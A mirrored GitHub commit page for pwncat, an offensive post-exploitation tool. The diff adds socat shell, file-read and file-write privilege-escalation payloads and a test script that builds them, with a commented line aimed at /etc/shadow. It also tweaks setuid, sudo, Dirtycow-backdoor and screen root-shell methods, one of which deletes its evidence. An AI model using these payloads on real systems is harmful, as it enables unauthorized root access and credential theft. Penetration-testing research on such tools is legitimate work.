1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-30 20:34:15 +01:00

Changed privesc methods to use run() rather than process()... seems to work?? Added socat as a gtfobins

This commit is contained in:
John Hammond 2020-05-13 18:58:31 -04:00
parent 80c4e9839a
commit 84a5cb7deb
7 changed files with 67 additions and 12 deletions

View File

@ -11,6 +11,7 @@
"payload": "{command} 2>/dev/null", "payload": "{command} 2>/dev/null",
// This is used to pass arguments to the application (auto-merged // This is used to pass arguments to the application (auto-merged
// into "{command}". // into "{command}".
// IF YOUR COMMAND TAKES ARGUMENTS, YOU MUST SUPPLY THEM HERE. // IF YOUR COMMAND TAKES ARGUMENTS, YOU MUST SUPPLY THEM HERE.
"args": ["if={lfile}"], "args": ["if={lfile}"],
// Prepends arguments, if any to the "args" for setuid context. // Prepends arguments, if any to the "args" for setuid context.
@ -261,13 +262,41 @@
"type": "shell", "type": "shell",
"payload": "TF=$({mktemp}); echo 'system(\"{shell}\")' > $TF; {command}", "payload": "TF=$({mktemp}); echo 'system(\"{shell}\")' > $TF; {command}",
"args": ["--no-stop", "-q", "$TF"], "args": ["--no-stop", "-q", "$TF"],
"exit": "exit" "exit": "exit\n"
}, },
{ {
"type": "read", "type": "read",
"payload": "TF=$({mktemp}); echo 'system(\"{cat} {lfile}\")' > $TF; {command}", "payload": "TF=$({mktemp}); echo 'system(\"{cat} {lfile}\")' > $TF; {command}",
"args": ["--no-stop", "-q", "$TF"], "args": ["--no-stop", "-q", "$TF"],
"exit": "exit" "exit": "exit\n"
} }
],
"socat": [
{
"type": "shell",
"payload": "{command}",
"args": ["STDIN", "EXEC:{shell}"],
"exit": "exit\n"
},
{
"type": "read",
"payload": "{command}",
"args": ["-u", "FILE:{lfile}", "STDOUT"]
},
{
"type": "write",
"stream": "print",
"payload": "{command} 2>/dev/null",
"args": ["-u", "STDIN", "CREATE:{lfile}"],
"exit": "{ctrl_d}"
},
{
"type": "write",
"stream": "base64",
"payload": "{base64} -d | {command} 2>/dev/null",
"args": ["-u", "STDIN", "CREATE:{lfile}"],
"exit": "{ctrl_d}"
}
] ]
} }

View File

@ -16,5 +16,24 @@ def which(path: str, quote=False):
gtfo = GTFOBins("data/gtfobins.json", which) gtfo = GTFOBins("data/gtfobins.json", which)
all_binaries = list(gtfo.iter_methods(Capability.SHELL))
print(all_binaries[0].build(shell="/bin/bash", suid=True)) binary_to_test = "socat"
capabilities_to_test = Capability.WRITE
our_shell = "/bin/bash"
socat = gtfo.find_binary(binary_to_test)
print(socat)
print(vars(socat))
methods = socat.iter_methods(
which(binary_to_test), caps=capabilities_to_test, stream=None
)
for method in methods:
print(method)
print(method.build(lfile="/tmp/test", data="hello")[0])
break
# print(method.build(shell=our_shell)[0])
# print(method.build(lfile="/etc/shadow", suid=True)[0])
# all_binaries = list(gtfo.iter_methods(Capability.SHELL))
# print(all_binaries[0].build(shell="/bin/bash", suid=True))

View File

@ -21,8 +21,8 @@ from pwncat import util
# privesc_methods = [SetuidMethod, SuMethod] # privesc_methods = [SetuidMethod, SuMethod]
# privesc_methods = [SuMethod, SudoMethod, SetuidMethod, DirtycowMethod, ScreenMethod] # privesc_methods = [SuMethod, SudoMethod, SetuidMethod, DirtycowMethod, ScreenMethod]
privesc_methods = [SuMethod, SudoMethod, ScreenMethod, SetuidMethod] # privesc_methods = [SuMethod, SudoMethod, SetuidMethod]
# privesc_methods = [SuMethod, SudoMethod] privesc_methods = [SuMethod, SetuidMethod]
class Finder: class Finder:
@ -302,8 +302,11 @@ class Finder:
# Check if we ended up in a sub-shell without escalating # Check if we ended up in a sub-shell without escalating
if self.pty.getenv("SHLVL") != shlvl: if self.pty.getenv("SHLVL") != shlvl:
# Get out of this subshell. We don't need it # Get out of this subshell. We don't need it
self.pty.process(exit_script, delim=False) # self.pty.process(exit_script, delim=False)
self.pty.run(exit_script, wait=False)
self.pty.recvuntil("\n")
# Clean up whatever mess was left over # Clean up whatever mess was left over
self.pty.flush_output() self.pty.flush_output()

View File

@ -90,7 +90,9 @@ class DirtycowMethod(Method):
raise PrivescError("backdoor user not created") raise PrivescError("backdoor user not created")
# Become the new user! # Become the new user!
self.pty.process(f"su {self.pty.privesc.backdoor_user_name}", delim=False) self.pty.run(f"su {self.pty.privesc.backdoor_user_name}", wait=False)
self.pty.recvuntil(": ")
self.pty.client.send(self.pty.privesc.backdoor_password.encode("utf-8") + b"\n") self.pty.client.send(self.pty.privesc.backdoor_password.encode("utf-8") + b"\n")
return "exit" return "exit"

View File

@ -148,7 +148,7 @@ class ScreenMethod(Method):
self.pty.run("popd") self.pty.run("popd")
# Start the root shell! # Start the root shell!
self.pty.process(f"{rootshell}", delim=False) self.pty.run(f"{rootshell}", wait=False)
# Remove the evidence # Remove the evidence
self.pty.run(f"unlink {libhack_so} {libhack_c} {rootshell_c} {rootshell}") self.pty.run(f"unlink {libhack_so} {libhack_c} {rootshell_c} {rootshell}")

View File

@ -93,7 +93,8 @@ class SetuidMethod(Method):
payload, input_data, exit_cmd = method.build(shell=self.pty.shell, suid=True) payload, input_data, exit_cmd = method.build(shell=self.pty.shell, suid=True)
# Run the start commands # Run the start commands
self.pty.process(payload, delim=False) # self.pty.process(payload, delim=False)
self.pty.run(payload, wait=False)
# Send required input # Send required input
self.pty.client.send(input_data.encode("utf-8")) self.pty.client.send(input_data.encode("utf-8"))

View File

@ -212,7 +212,8 @@ class SudoMethod(Method):
) )
# Run the commands # Run the commands
self.pty.process(payload, delim=True) # self.pty.process(payload, delim=True)
self.pty.run(payload, wait=True)
# This will check if the password is needed, and attempt to send it or # This will check if the password is needed, and attempt to send it or
# fail, and return # fail, and return